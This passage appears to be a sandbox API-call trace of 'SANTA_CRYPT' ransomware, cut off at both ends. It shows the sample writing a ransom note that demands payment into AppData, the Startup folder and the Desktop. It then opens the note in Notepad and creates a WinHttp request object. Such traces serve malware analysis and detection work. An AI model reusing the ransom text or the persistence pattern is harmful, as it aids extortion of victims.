dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0135.251] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.251] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f844 | out: lpNewFilePointer=0x0) returned 1 [0135.251] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.251] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f824 | out: lpNewFilePointer=0x0) returned 1 [0135.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0135.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0135.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0135.252] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f834 | out: lpNewFilePointer=0x0) returned 1 [0135.252] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144f85c, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144f85c*=0x0, lpOverlapped=0x0) returned 1 [0135.252] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.252] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f824 | out: lpNewFilePointer=0x0) returned 1 [0135.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", cchWideChar=200, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 200 [0135.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc8) returned 0x4365138 [0135.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", cchWideChar=200, lpMultiByteStr=0x4365138, cbMultiByte=200, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", lpUsedDefaultChar=0x0) returned 200 [0135.252] WriteFile (in: hFile=0x2a0, lpBuffer=0x19d20a8*, nNumberOfBytesToWrite=0xc7, lpNumberOfBytesWritten=0x144f85c, lpOverlapped=0x0 | out: lpBuffer=0x19d20a8*, lpNumberOfBytesWritten=0x144f85c*=0xc7, lpOverlapped=0x0) returned 1 [0135.253] CloseHandle (hObject=0x2a0) returned 1 [0135.253] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x144f218 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x0 [0135.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0135.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0135.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0135.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0135.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\HOW_TO_RECOVER_MY_FILES.TXT" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\how_to_recover_my_files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0135.255] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.255] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f844 | out: lpNewFilePointer=0x0) returned 1 [0135.255] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.255] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f824 | out: lpNewFilePointer=0x0) returned 1 [0135.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0135.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0135.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0135.255] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f834 | out: lpNewFilePointer=0x0) returned 1 [0135.255] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144f85c, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144f85c*=0x0, lpOverlapped=0x0) returned 1 [0135.255] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.255] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f824 | out: lpNewFilePointer=0x0) returned 1 [0135.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", cchWideChar=200, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 200 [0135.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc8) returned 0x4365138 [0135.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", cchWideChar=200, lpMultiByteStr=0x4365138, cbMultiByte=200, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", lpUsedDefaultChar=0x0) returned 200 [0135.255] WriteFile (in: hFile=0x258, lpBuffer=0x19d20a8*, nNumberOfBytesToWrite=0xc7, lpNumberOfBytesWritten=0x144f85c, lpOverlapped=0x0 | out: lpBuffer=0x19d20a8*, lpNumberOfBytesWritten=0x144f85c*=0xc7, lpOverlapped=0x0) returned 1 [0135.256] CloseHandle (hObject=0x258) returned 1 [0135.257] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x144f218 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0135.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0135.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0135.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0135.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0135.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\HOW_TO_RECOVER_MY_FILES.TXT" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\how_to_recover_my_files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0135.411] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.411] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f844 | out: lpNewFilePointer=0x0) returned 1 [0135.411] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.411] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f824 | out: lpNewFilePointer=0x0) returned 1 [0135.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0135.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0135.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0135.411] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f834 | out: lpNewFilePointer=0x0) returned 1 [0135.411] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144f85c, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144f85c*=0x0, lpOverlapped=0x0) returned 1 [0135.411] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.411] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f824 | out: lpNewFilePointer=0x0) returned 1 [0135.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", cchWideChar=200, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 200 [0135.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc8) returned 0x4365138 [0135.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", cchWideChar=200, lpMultiByteStr=0x4365138, cbMultiByte=200, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", lpUsedDefaultChar=0x0) returned 200 [0135.412] WriteFile (in: hFile=0x2a0, lpBuffer=0x19d20a8*, nNumberOfBytesToWrite=0xc7, lpNumberOfBytesWritten=0x144f85c, lpOverlapped=0x0 | out: lpBuffer=0x19d20a8*, lpNumberOfBytesWritten=0x144f85c*=0xc7, lpOverlapped=0x0) returned 1 [0135.413] CloseHandle (hObject=0x2a0) returned 1 [0135.540] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x144f218 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0135.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0135.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0135.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0135.541] ShellExecuteExW (in: pExecInfo=0x144f870*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="open", lpFile="C:\\WINDOWS\\notepad.exe", lpParameters="\"C:\\Users\\FD1HVy\\Desktop\\HOW_TO_RECOVER_MY_FILES.TXT\"", lpDirectory="", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x144f870*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="open", lpFile="C:\\WINDOWS\\notepad.exe", lpParameters="\"C:\\Users\\FD1HVy\\Desktop\\HOW_TO_RECOVER_MY_FILES.TXT\"", lpDirectory="", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x44c)) returned 1 [0135.868] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0135.868] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0136.637] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0136.637] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0137.404] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0137.404] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0138.169] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0138.169] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0138.925] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0138.925] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0139.673] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0139.673] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0140.425] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0140.426] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0141.176] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0141.176] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0141.926] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0141.926] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0142.691] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0142.691] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0146.175] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0146.175] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0146.617] GetProcessId (Process=0x44c) returned 0xfec [0146.617] CloseHandle (hObject=0x44c) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0146.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0146.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c99c8 | out: hHeap=0x1780000) returned 1 [0146.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0146.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0146.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0146.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0146.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0146.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0146.618] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0146.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0146.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0146.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0146.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0146.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0146.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0146.618] CoInitialize (pvReserved=0x0) returned 0x1 [0146.618] CoUninitialize () [0146.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3c) returned 0x43a1610 [0146.618] CLSIDFromProgID (in: lpszProgID="WinHttp.WinHttpRequest.5.1", lpclsid=0x43a1628 | out: lpclsid=0x43a1628*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0 [0146.619] CoCreateInstance (in: rclsid=0x43a1628*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x43a1638*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x144f600 | out: ppv=0x144f600*=0x18523c0) returned 0x0 [0147.131] WinHttpRequest:IUnknown:QueryInterface (in: This=0x18523c0, riid=0x322c9c*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x144f5d0 | out: ppvObject=0x144f5d0*=0x0) returned 0x80004002 [0147.131] WinHttpRequest:IUnknown:QueryInterface (in: This=0x18523c0, riid=0x322c4c*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x144f5d0 | out: ppvObject=0x144f5d0*=0x0) returned 0x80004002 [0147.131] WinHttpRequest:IUnknown:QueryInterface (in: This=0x18523c0, riid=0x322c0c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43a1618 | out: ppvObject=0x43a1618*=0x18523c0) returned 0x0 [0147.131] WinHttpRequest:IUnknown:Release (This=0x18523c0) returned 0x1 [0147.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0147.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0147.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0147.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0147.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0147.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0147.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0147.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0147.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0147.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0147.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0147.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0147.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0147.132] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 1 [0147.132] TranslateMessage (lpMsg=0x144f9e4) returned 0 [0147.133] DispatchMessageW (lpMsg=0x144f9e4) returned 0x0 [0147.133] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0147.133] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0147.133] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0147.133] RtlSizeHeap (HeapHandle=0x1780000, Flags=0x0, MemoryPointer=0x1782dd8) returned 0x80 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0147.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca298 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a2078 [0147.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0147.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0147.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x499e748 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a80e8 [0147.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0147.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x160) returned 0x43f3c90 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a80e8 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499e748 | out: 